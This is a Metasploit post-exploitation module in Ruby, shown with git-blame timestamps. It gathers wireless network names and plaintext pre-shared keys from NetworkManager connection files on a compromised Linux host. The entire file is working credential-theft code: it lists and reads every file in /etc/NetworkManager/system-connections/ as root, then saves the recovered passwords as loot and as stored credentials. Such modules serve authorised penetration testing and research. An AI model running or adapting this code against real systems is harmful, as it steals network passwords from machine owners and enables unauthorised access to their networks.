2014-08-29 08:08:08 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-08-29 08:08:08 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Linux::Priv
|
|
|
|
include Msf::Post::Linux::System
|
|
|
|
|
2014-09-08 08:42:05 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
2014-08-29 08:08:08 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2014-09-16 17:47:44 +00:00
|
|
|
'Name' => 'Linux Gather 802-11-Wireless-Security Credentials',
|
2014-08-29 08:08:08 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module collects 802-11-Wireless-Security credentials such as
|
|
|
|
Access-Point name and Pre-Shared-Key from your target CLIENT Linux
|
|
|
|
machine using /etc/NetworkManager/system-connections/ files.
|
|
|
|
The module gathers NetworkManager's plaintext "psk" information.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => ['Cenk Kalpakoglu'],
|
|
|
|
'Platform' => ['linux'],
|
|
|
|
'SessionTypes' => ['shell', 'meterpreter']
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('DIR', [true, 'The default path for network connections',
|
|
|
|
'/etc/NetworkManager/system-connections/']
|
|
|
|
)
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def dir
|
|
|
|
datastore['DIR']
|
|
|
|
end
|
|
|
|
|
|
|
|
# Extracts AccessPoint name and PSK
|
2014-09-02 09:05:54 +00:00
|
|
|
def get_psk(data, ap_name)
|
2014-08-29 08:08:08 +00:00
|
|
|
data.each_line do |l|
|
|
|
|
if l =~ /^psk=/
|
|
|
|
psk = l.split('=')[1].strip
|
|
|
|
return [ap_name, psk]
|
|
|
|
end
|
|
|
|
end
|
|
|
|
nil
|
|
|
|
end
|
|
|
|
|
2014-09-02 09:05:54 +00:00
|
|
|
def extract_all_creds
|
|
|
|
tbl = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => '802-11-wireless-security',
|
|
|
|
'Columns' => ['AccessPoint-Name', 'PSK'],
|
|
|
|
'Indent' => 1,
|
|
|
|
})
|
2014-09-12 11:50:53 +00:00
|
|
|
files = cmd_exec("/bin/ls -1 #{dir}").chomp.split("\n")
|
2014-09-02 09:05:54 +00:00
|
|
|
files.each do |f|
|
|
|
|
file = "#{dir}#{f}"
|
|
|
|
# TODO: find better (ruby) way
|
|
|
|
if data = read_file(file)
|
|
|
|
print_status("Reading file #{file}")
|
|
|
|
ret = get_psk(data, f)
|
|
|
|
if ret
|
|
|
|
tbl << ret
|
2014-08-29 08:08:08 +00:00
|
|
|
end
|
|
|
|
end
|
2014-09-02 09:05:54 +00:00
|
|
|
end
|
|
|
|
tbl
|
|
|
|
end
|
2014-08-29 08:08:08 +00:00
|
|
|
|
2014-09-02 09:05:54 +00:00
|
|
|
def run
|
|
|
|
if is_root?
|
|
|
|
tbl = extract_all_creds
|
2014-08-29 08:08:08 +00:00
|
|
|
if tbl.rows.empty?
|
|
|
|
print_status('No PSK has been found!')
|
|
|
|
else
|
2014-09-08 08:42:05 +00:00
|
|
|
print_line("\n" + tbl.to_s)
|
2014-08-29 08:08:08 +00:00
|
|
|
p = store_loot(
|
|
|
|
'linux.psk.creds',
|
|
|
|
'text/csv',
|
|
|
|
session,
|
|
|
|
tbl.to_csv,
|
|
|
|
File.basename('wireless_credentials.txt')
|
|
|
|
)
|
2014-09-08 08:42:05 +00:00
|
|
|
|
2014-08-29 08:08:08 +00:00
|
|
|
print_good("Secrets stored in: #{p}")
|
2014-09-08 08:42:05 +00:00
|
|
|
|
|
|
|
tbl.rows.each do |cred|
|
|
|
|
user = cred[0] # AP name
|
|
|
|
password = cred[1]
|
|
|
|
create_credential(
|
|
|
|
workspace_id: myworkspace_id,
|
|
|
|
origin_type: :session,
|
|
|
|
address: session.session_host,
|
|
|
|
session_id: session_db_id,
|
|
|
|
post_reference_name: self.refname,
|
|
|
|
username: user,
|
|
|
|
private_data: password,
|
|
|
|
private_type: :password,
|
|
|
|
)
|
|
|
|
end
|
|
|
|
print_status("Done")
|
2014-08-29 08:08:08 +00:00
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error('You must run this module as root!')
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|